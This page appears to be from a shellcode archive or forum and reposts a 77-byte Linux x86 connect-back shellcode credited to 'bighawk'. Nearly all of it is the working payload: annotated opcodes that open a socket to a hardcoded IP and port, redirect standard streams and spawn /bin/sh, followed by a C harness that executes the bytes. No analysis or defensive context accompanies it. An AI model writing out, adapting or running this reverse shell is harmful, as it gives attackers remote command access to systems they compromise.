77 bytes connect-back shellcode - linux-x86
Do, 09/12/2007 - 19:27 — OeX
shellcode:
/* 77 bytes connect-back shellcode - linux-x86
* - by bighawk (bighawk@warfare.com)
*
* This shellcode connects back to you
*
*/
#define IPADDR "\x31\x03\x03\x07"
#define PORT "\x27\x10"
char code[] =
"\x31\xdb" // xor ebx, ebx
"\xf7\xe3" // mul ebx
"\xb0\x66" // mov al, 102
"\x53" // push ebx
"\x43" // inc ebx
"\x53" // push ebx
"\x43" // inc ebx
"\x53" // push ebx
"\x89\xe1" // mov ecx, esp
"\x4b" // dec ebx
"\xcd\x80" // int 80h
"\x89\xc7" // mov edi, eax
"\x68\x7f"IPADDR // push dword IPADDR
"\x66\x68"PORT // push word PORT
"\x43" // inc ebx
"\x66\x53" // push bx
"\x89\xe6" // mov esi, esp
"\xb0\x10" // mov al, 16
"\x50" // push eax
"\x56" // push esi
"\x57" // push edi
"\x89\xe1" // mov ecx, esp
"\x43" // inc ebx
"\xb0\x66" // mov al, 102
"\xcd\x80" // int 80h
"\x89\xd9" // mov ecx, ebx
"\x89\xfb" // mov ebx, edi
"\xb0\x3f" // mov al, 63
"\x49" // dec ecx
"\xcd\x80" // int 80h
"\x41" // inc ecx
"\xe2\xf8" // loop duploop
"\x51" // push ecx
"\x68\x6e\x2f\x73\x68" // push dword 68732f6eh
"\x68\x2f\x2f\x62\x69" // push dword 69622f2fh
"\x89\xe3" // mov ebx, esp
"\x51" // push ecx
"\x53" // push ebx
"\x89\xe1" // mov ecx, esp
"\xb0\x0b" // mov al, 11
"\xcd\x80"; // int 80h
main() {
void (*a)() = (void *)code;
printf("size: %d bytes\n", strlen(code));
a();
}- 148 lecturas
Comentarios
Enviar un comentario nuevo